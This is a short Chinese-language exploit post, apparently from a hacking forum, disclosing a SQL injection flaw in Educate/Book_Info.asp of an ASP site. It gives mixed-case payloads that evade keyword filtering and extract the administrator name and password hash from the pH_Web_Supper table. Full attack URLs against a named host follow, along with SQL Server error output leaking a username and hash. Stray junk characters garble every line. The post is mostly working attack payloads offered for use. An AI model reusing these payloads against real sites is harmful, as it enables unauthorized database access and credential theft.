漏洞出现在Educate/Book_Info.asp! H7 c4 ?3 ]# U6 j. [
此处注入点虽然过滤了一些关键字 但是我们还是可以盲注的 可以利用sqlmap跑出
4 o8 s* o, Z6 b* B- A# uexp:如下6 l2 u5 r m* [! G6 q
查询管理账号:+aNd+0=(selEct+toP+1+su_SupperName+frOm+pH_Web_Supper)
f8 s2 g' m7 [2 H2 j0 G查询管理密码:+aNd+0=(selEct+toP+1+su_Password+frOm+pH_Web_Supper)$ X' ^+ K; Z# f8 |
http://jobs.0day5.com/Educate/Book_Info.asp?Param=20+aNd+0=(selEct+toP+1+su_SupperName+frOm+pH_Web_Supper)2 t P1 v+ T3 Z [
Microsoft OLE DB Provider for SQL Server 错误 '80040e07'9 H' o" A$ @- t
将 nvarchar 值 'hackbase' 转换为数据类型为 int 的列时发生语法错误。 E+ h. o- {$ V. `; I( b
/Educate/Book_Info.asp,行 8
- R; U( N5 p1 u% @' m. x* ]http://jobs.0day5.com/Educate/Book_Info.asp?Param=20+aNd+0=(selEct+toP+1+su_Password+frOm+pH_Web_Supper)- ~. E s: v$ `0 D2 P' |0 E2 K' Z
Microsoft OLE DB Provider for SQL Server 错误 '80040e07'+ o: h% o4 u& w# g- B0 ]1 [
将 nvarchar 值 '165706AD8319D7F95B7FC5E82FBE8F' 转换为数据类型为 int 的列时发生语法错误。
7 k7 x% D) U p/Educate/Book_Info.asp,行 8 |